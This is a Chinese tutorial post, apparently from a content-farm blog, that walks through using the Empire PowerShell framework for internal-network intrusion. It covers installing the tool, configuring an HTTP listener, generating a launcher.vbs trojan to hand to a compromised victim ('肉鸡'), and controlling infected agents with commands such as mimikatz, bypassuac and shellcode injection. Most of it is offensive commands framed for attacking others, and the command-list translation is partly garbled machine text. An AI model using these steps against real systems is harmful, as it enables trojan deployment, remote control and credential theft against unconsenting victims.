我的天,内网渗透,大黑客是这样进行操作的

1、Empire工具介绍Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上 。Empire实现了无需powershell.exe就可运行PowerShell代理的功能 。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中
 2、Empire工具安装虽然渗透的目标是windows,但Empire本身应该是运行在linux平台的,首先把程序目录下载下来:
git clone EmpireProject/Empire
接着就转进”Empire/setup”目录,安装./install.sh 。
sudo ./install.sh
3、Empire工具的攻击利用执行 sudo ./empire #执行工具操作

我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
执行 listeners #进入监听列表
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
如果出现[!] Invalid listener name 那么先执行 uselistener http 选择http模块 再执行info 即可,跳出就back
 
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
直接命令
set Name hacker
set Host http://192.168.1.14:443
 
设置完之后:
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
然后执行: run #运行监听 。运行监听之后生成木马 。如果没有run 命令就用 execute 取代run命令
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
执行:usestager 空格 然后Tab按键 会出现
bunny ducky hta launcher_bat launcher_vbs pth_wmis stager war dll hop_php launcher launcher_sct macro scrambled_macro teensy
 
Windows 就选择 launcher_bat launcher_vbs 等 。。PHP 就选择 hop_php
比如我选择: launcher_vbs
执行:usestager launcher_vbs 监听列表的名字 #这里就是hacker, hacker就是我刚刚设置的监听列表名字 (set Listener hacker)
然后执行:info 查看设置配置,木马脚本放在了 /tmp/launcher.vbs
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
然后执行:execute #运行 生成木马,生成成功 然后执行: sudo chmod 777 /tmp/launcher.vbs #赋予可读可写权限 然后丢给肉鸡运行
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
生成成功
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
然后查看肉鸡列表 执行命令: agents PS:如果你exit了 也就是退出了 你也可以直接执行agents命令查看肉鸡列表
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
如果要控制肉鸡的话:
就执行: interact 肉鸡的名字
我的天,内网渗透,大黑客是这样进行操作的

文章插图
 
进入之后 执行帮助 help 查看 肉鸡控制器的命令
agents 跳跃的代理人的菜单
back 返回菜单
bypassuac 运行bypassuac,开创一个新的高完整性为监听代理 。产卵<监听器>
clear 清除代理任务 。
【我的天,内网渗透,大黑客是这样进行操作的】creds 从数据库显示/返回凭证 。
download 任务代理下载文件
exit 任务代理退出
help 显示菜单或语法for the help特定的命令 。
info 显示有关此代理的信息
injectshellcode listener shellcode inject进入偏远的过程 。前listener米 。injectshellcode<><>_ PID
jobs 返回工作或杀死一个正在运行的工作
kill 任务杀死特定进程名称或ID.的代理
killdate 获取或设置一个代理的killdate(01 / 01 / 2016) 。
list 列出所有活动代理(或侦听器)
listeners 跳转到监听器菜单
lostlimit 任务代理更改丢失代理检测的限制
main 回到主菜单
mimikatz 运行在客户端- mimikatz Invoke
psinject inject发射器向远程进程 。例如,psinject > <名> < PID
pth 执行一个credid PTH通过Mimikatz 。
rename 重命名代理
revtoself 使用凭证/令牌还原令牌权限 。
sc 需要截图,默认是PNG 。给一个比率意味着使用JPEG 。例SC [ 1 ]
scriptcmd 执行在目前进口PowerShell脚本函数 。
scriptimport 进口的PowerShell脚本保存在存储器中的代理 。
searchmodule 模块搜索帝国名称/描述 。
shell 使用shell命令的代理任务 。
sleep 任务代理睡眠间隔[抖动]


推荐阅读